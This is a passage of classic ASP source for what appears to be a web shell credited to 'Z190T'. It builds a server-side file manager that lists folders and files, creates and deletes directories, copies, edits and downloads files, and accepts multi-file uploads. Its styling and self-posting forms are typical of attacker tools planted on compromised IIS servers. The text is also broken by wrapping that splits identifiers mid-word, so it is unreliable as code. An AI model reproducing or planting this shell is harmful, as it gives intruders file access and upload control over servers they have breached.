fo=fo+1 Response.Write "<font face=wingdings color=red >-</font> <FONT COLOR=#eeeeee ><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.nam e & "</span></FONT><BR>" Next %> <BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")% >?txtpath=<%=MyPath%>"> <table bgcolor=#0A750A cellspacing=4><tr><td> <font face=arial size=-1 title="Create and Delete folders by entering their name s here manually.">New Directory:</td></tr> <tr><td align=right ><input type=text size=20 name=DirName><BR> <input type=submit name=cmd value=Create><input type=submit name=cmd value=Delet e><input type=hidden name=DirStuff value=@> </tr></td></table></form> <% Response.Write "<BR></td><td valign=top width=50% bgcolor=#000000 >Files:<BR><BR >" Response.Flush %> <form method=post name=frmCopySelected action="<%=Request.Servervariables("S CRIPT_NAME")%>?txtpath=<%=MyPath%>"> <% Response.write "<center><select name=Fname size=" & fi+3 & " style=""backgro und-color: rgb(00,00,00); color: rgb(222,222,222)"">" For each file in folder.Files '-->FILEz Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.nam e & " -- [" & Int(file.size/1024)+1 & " kb]</option>" Next Response.write "</select>" Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Dow nload>" %> </form> <% Response.Write "<BR></td></tr><tr><td align=center ><B>Folders: " & fo & "</ b></td><td align=center ><b>Files: " & fi & "</b></td></tr></table><BR>" ' ---View Tree Ends Here ' ---Upload Routine starts here %> <center> <form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Serverv ariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>"> <table bgcolor="#0A750A" cellpadding="8"> <tr> <td bgcolor=#000000 valign="bottom"><font size=+1 face=wingdings color=white >+</font><font face="Arial" size=-2 color="#FFFFFF"> CHOOSE FILES:<br> <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE2"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE3"><BR> &nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If yo u recieve an error while uploading, then most likely you do not have write acces s to disk !!"> </font></td> </tr> </table> </form></center> <%

' ---Upload Routine stops here %> </font><HR><P align=right><font color=#0A750A><TT>Copyright 2011 Z190T</B></font ><BR><font size=1 face=arial color=green>[ System: <%=now%> ]</font></p><BR> </body></html>

You might also like